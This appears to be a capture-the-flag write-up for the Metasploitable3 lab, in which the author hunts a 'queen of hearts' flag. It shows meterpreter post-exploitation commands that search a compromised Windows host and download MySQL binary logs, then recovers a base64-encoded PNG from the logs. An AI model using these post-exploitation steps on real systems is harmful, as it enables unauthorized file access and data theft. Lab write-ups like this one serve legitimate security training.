100776/rwxrwxrw-  505608   fil   2016-11-25 20:47:42 -0500  seven_of_spades.pdf
100776/rwxrwxrw-  384916   fil   2016-11-25 20:47:42 -0500  six_of_diamonds.zip
100776/rwxrwxrw-  406134   fil   2016-11-25 20:47:42 -0500  ten_of_diamonds.png
100776/rwxrwxrw-  519696   fil   2016-11-25 20:47:43 -0500  three_of_spades.png

There's an SQL file for the queen of hearts, let's troubleshoot my issue:

This Blob seems to be complete, it ends in "=" as base64 file should
Let's run this:
root@igor-kali:~# service mysql start
root@igor-kali:~# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.6.30-1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> quit
Bye
root@igor-kali:~# mysql < queen_of_hearts.sql 
ERROR 1049 (42000) at line 1: Unknown database 'cards'
root@igor-kali:~# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.6.30-1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> create database cards -> ; Query OK, 1 row affected (0.02 sec) mysql> quit Bye root@igor-kali:~# mysql < queen_of_hearts.sql root@igor-kali:~# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 6 Server version: 5.6.30-1 (Debian) Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> use cards Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables -> ; +-----------------+ | Tables_in_cards | +-----------------+ | queen_of_hearts | +-----------------+ 1 row in set (0.00 sec)


mysql> select * from queen_of_hearts
    -> ;
......
....1HTEqnJMwtap0tNueIat8JActYbNMNUSRT7dj3HF2lXTOTLyhLlupD53M95t+oDIFIUZCP6AiaG0nZDmkhEoSprb
ZXSvBlrOCqixILmalkSUkxW63w+wVx8cr+q7DFRVKQT2f5c+sCDGwz5Ha1oirawwRjTjUivolUjgZKRhrsSlHY6fI0Pf
suxZjnMTFjz4bWr7Hq/Umn2kLjg8P5LMrUc9crdcSSIUEchVFiSFibYG1xSRNH3lYLnvljD4Jsb3M/LXs4nNjbx+xdZ/
RpJPjW/l9zZ57TpN/cvT6UdkbfnV0krlwxXNn9uV6P3ly/KX2Sej/8Z+81H/1nWX5H/zSu/zC8oeSsyCEHo1zDh10NiX
RJC/hQ1oZSic3fut7UClLfeJEhNnudigQQiCZODRp/KVYStl7IIRADImQN1CVJUGDj+wud+yaFqM1r7/1HpdXe/ogEiO
t4c7pIVdXO9oMPZ4eHfHg4SU/+ZmPEULkj7/xFs6VEoaS4M6tJX/3f/j7/M+/+U/Ef387cHqyYrWaTe89eoFJ+14ITCk
q3n77KVXepOqqEIKX4MM4bZnPCxbzetJJazQXF3vu35Wi7bVXX+J7bz9gtMXf7nqMctzMW0lZLhXU6CcPgxqwbrxldDb
3ypHD1qJUJGb5Ytd5NG6C85zJG742pDyeGvqA95423+AMPd6nye63XtSisc+7fNu0ohtWCmI2nNJiK22MmsiqoY2YRt7 |

These ends like the file I extracted, something is wrong with this query, I guess MySQL doesn't like that data, the field of the table must have been setup incorrectly
So I got this flag, The Queen of Hearts, it's just broken.
UPDATE: Found it!

Someone commented to keep looking, so I went to take another look:
meterpreter > cd c:\
meterpreter > pwd
C:\
meterpreter > search -f queen*
Found 7 results...
    C:\ManageEngine\DesktopCentral_Server\pgsql\share\timezone\Australia\Queensland (413 bytes)
    C:\tools\ruby23\lib\ruby\gems\2.3.0\gems\tzinfo-data-1.2016.10\lib\tzinfo\data\definitions\Australia\Queensland.rb (382 bytes)
    C:\tools\ruby23\lib\ruby\gems\2.3.0\gems\tzinfo-data-1.2016.7\lib\tzinfo\data\definitions\Australia\Queensland.rb (382 bytes)
    C:\vagrant\resources\flags\queen_of_hearts.sql (728672 bytes)
    C:\wamp\bin\mysql\mysql5.5.20\data\cards\queen_of_hearts.frm (8560 bytes)

I didn't go to the data folder!!!!!

D'oh!!
Ok, let's go there
meterpreter > ls -al
Listing: C:\wamp\bin\mysql\mysql5.5.20\data
===========================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40776/rwxrwxrw-   0         dir   2016-11-25 22:54:11 -0500  cards
100776/rwxrwxrw-  5242880   fil   2016-12-09 18:03:31 -0500  ib_logfile0
100776/rwxrwxrw-  5242880   fil   2016-11-25 22:36:49 -0500  ib_logfile1
100776/rwxrwxrw-  18874368  fil   2016-12-09 18:03:31 -0500  ibdata1
100776/rwxrwxrw-  5         fil   2016-12-09 17:58:45 -0500  metasploitable3.pid
40776/rwxrwxrw-   28672     dir   2016-11-25 22:36:29 -0500  mysql
100776/rwxrwxrw-  117646    fil   2016-11-25 22:47:01 -0500  mysql-bin.000001
100776/rwxrwxrw-  729073    fil   2016-11-25 22:54:11 -0500  mysql-bin.000002
100776/rwxrwxrw-  352765    fil   2016-12-05 18:13:08 -0500  mysql-bin.000003
100776/rwxrwxrw-  79814     fil   2016-12-06 02:16:29 -0500  mysql-bin.000004
100776/rwxrwxrw-  2191      fil   2016-12-08 21:02:14 -0500  mysql-bin.000005
100776/rwxrwxrw-  2172      fil   2016-12-09 18:03:28 -0500  mysql-bin.000006
100776/rwxrwxrw-  114       fil   2016-12-09 17:58:44 -0500  mysql-bin.index
40776/rwxrwxrw-   8192      dir   2016-11-25 22:36:29 -0500  performance_schema
40776/rwxrwxrw-   0         dir   2016-11-25 22:36:29 -0500  test
40776/rwxrwxrw-   4096      dir   2016-11-25 22:37:03 -0500  wordpress
Bin logs! BINGO!!

Download them all:

meterpreter > download mysql-bin.000001  mysql-bin.000002 mysql-bin.000003 mysql-bin.000004 mysql-bin.000005 mysql-bin.000006 mysql-bin.index
[*] downloading: mysql-bin.000001 -> mysql-bin.index/mysql-bin.000001
[*] download   : mysql-bin.000001 -> mysql-bin.index/mysql-bin.000001
[*] downloading: mysql-bin.000002 -> mysql-bin.index/mysql-bin.000002
[*] download   : mysql-bin.000002 -> mysql-bin.index/mysql-bin.000002
[*] downloading: mysql-bin.000003 -> mysql-bin.index/mysql-bin.000003
[*] download   : mysql-bin.000003 -> mysql-bin.index/mysql-bin.000003
[*] downloading: mysql-bin.000004 -> mysql-bin.index/mysql-bin.000004
[*] download   : mysql-bin.000004 -> mysql-bin.index/mysql-bin.000004
[*] downloading: mysql-bin.000005 -> mysql-bin.index/mysql-bin.000005
[*] download   : mysql-bin.000005 -> mysql-bin.index/mysql-bin.000005
[*] downloading: mysql-bin.000006 -> mysql-bin.index/mysql-bin.000006
[*] download   : mysql-bin.000006 -> mysql-bin.index/mysql-bin.000006


root@igor-kali:~/mysql-bin.index# ls -al
total 1272
drwxr-xr-x  2 root root   4096 Dec  9 18:22 .
drwxr-xr-x 26 root root   4096 Dec  9 18:23 ..
-rw-r--r--  1 root root 117646 Nov 25 22:47 mysql-bin.000001
-rw-r--r--  1 root root 729073 Nov 25 22:54 mysql-bin.000002
-rw-r--r--  1 root root 352765 Dec  5 18:13 mysql-bin.000003
-rw-r--r--  1 root root  79814 Dec  6 02:16 mysql-bin.000004
-rw-r--r--  1 root root   2191 Dec  8 21:02 mysql-bin.000005
-rw-r--r--  1 root root   2172 Dec  9 18:03 mysql-bin.000006
root@igor-kali:~/mysql-bin.index# mysqlbinlog mysql-bin.000002|less

...
insert into queen_of_hearts values ('iVBORw0KGgoAAAANSUhEUgAAAgkAAALZCAYAAAA9XLLXAAAACXBIWXMA
ABcRAAAXEQHKJvM/AAAgAElEQVR42uy9Waxt2XUdNtZauz39ue27r6tivWIVG5GUSEk0EHWWrAYKDEKwA8QfAZyPKB/6s
D+MfAmIg/g/QoBECPMRWTECBCKkCLZlR4lsJXIgSjRFiyVWkcXqq957t7/3dLtfe+djjbn32UXbotWTOuuDl/fVuWfvvd
Zca8855phjqqZp8Oc5XvnC5z6tlfrRssw/XeT5pwDg8uL8BAA8LwAAhFEEAFBKtX+XZ6n7P03pftja/a40AMAP3d8Y4/5
Ga/fz/PwpP2YAALPZHNvXQtNdo7IWAJCs1gCAyYSf9UMAQFFWAICyKtw1VM1/zwAAcTxwv1fu32WuVWPba9S1+w7fc9e1
vGaRl/wOd600cfcQRO6+szzvPccgiN01avd7mnXXML7v5ixN3LV89xnNuUk3GwDAweEd97mi4rWi3loZuPu/ubzgXBXtf
/NDd/2AcyTPUXEuPLcsKPjdYcTP8/6Lwn1XWTe9NUdTtdfIMvfMUTTgWrv79wM3R5vUzVGVuecZjSfuvj13LVu5Oa1yfq
5y3z2Y7rfX4G3DM4a/V7QjWTDeTyNr6n63/Pnk8RkAYO/AzWUcjXgPYXuNwPNpJzm/ynJN020ThtEN10nznkLet/t8wOc
u+Rx13e1lj2vbWD6z2Kj2OGduTjSc3a/WK3e/Az4o94snc8fnbqq0vUbDOUgS992Bz33KvzXGPWdjPP6F+/fl9W1vjidT
N0c1NJ+ns13NyVDc59Y...
...
2p//Pf7g+D6YfGQ4Gb5mO+29aLkJ/Mu7Xc+z2lQvUyy1IRK4FGeHQwYrWXSKdBQ/PQ6oTyhDFzzGAdCxenOxKc4kCHcqH
np4cMuBlGCJ70xoLEbIXpF6KzsJImwNMVlgdlwkJi+QxQyK83Mo6tZKOzDNaJImWyb/lSCrnuO/RaJwakHYw2mPKFEZSy
GUouRtjIJM2CFJOUJIjybMM+cbMMl5EXfpEmzBZbkvKpXKoHn2o/GCRnH8HiWTAhJIxipeIXLtI6FxyeyrbrFLe2iAtZu
ly221yr8rFyh54wQ6k7Mf56aEMXLg3hyiqRDGyCQtP3lVBLpOKEkLlCMmry/wmmCQKI9EnKhik3KTnp0uhaDPjcgxFlcr
DqwiVJG/id9hxQTl2zGu0cMouN2STMGeRnzOuXMafipXJUEzzQ5LP5L1PifJlXjOH1zAlX76LVLDbt/crsyiPcwUy2tG5
wxgd0LioFJDKwme4ftsWJ3PELcDcZ8xGQxu/SlUIHJwkokvlmpOopArvyBinyhzU3MpyfRo3SxAEoXe8k1foVxTE61WeZ
5wrys4XvowKtrHmXVxdEXEjKWbuPvsNa99cAN28ft3Kga8S5cFlpOYKfWNcLNhA6T5d5v9gCB8IrpK4SyGwhg/KIVtqY4
wZwp3K0L+ruURQIntylaPWuuWs0A5QM9l+rzZar5aezxhXMvYqIUPOwRWZYwYlpFnrXEgOf84zL8rq3o/XdgU4g47lxYy
Z90V4HCpY5yMBVtGuPmNY74IVDwVkR9wSi/CNGB9t0BXeF7JhHo9T95mVSVd5o+u6hat8sfiM5xX/66Pv/PCT/y9THv8X
XghZHGK1hfwAAAAASUVORK5CYII=')
There it is! Complete with it's '='
Ok, no let's extract it:
I just used 'vi' and removed the SQL stuff from the beginning and the end of the file:
Remove this:
create table queen_of_hearts ( card TEXT )
insert into queen_of_hearts values ('
and this:
')
root@igor-kali:~# cat queen_of_hearts.data | base64 -d > queen_of_hearts.png
The Queen of Hearts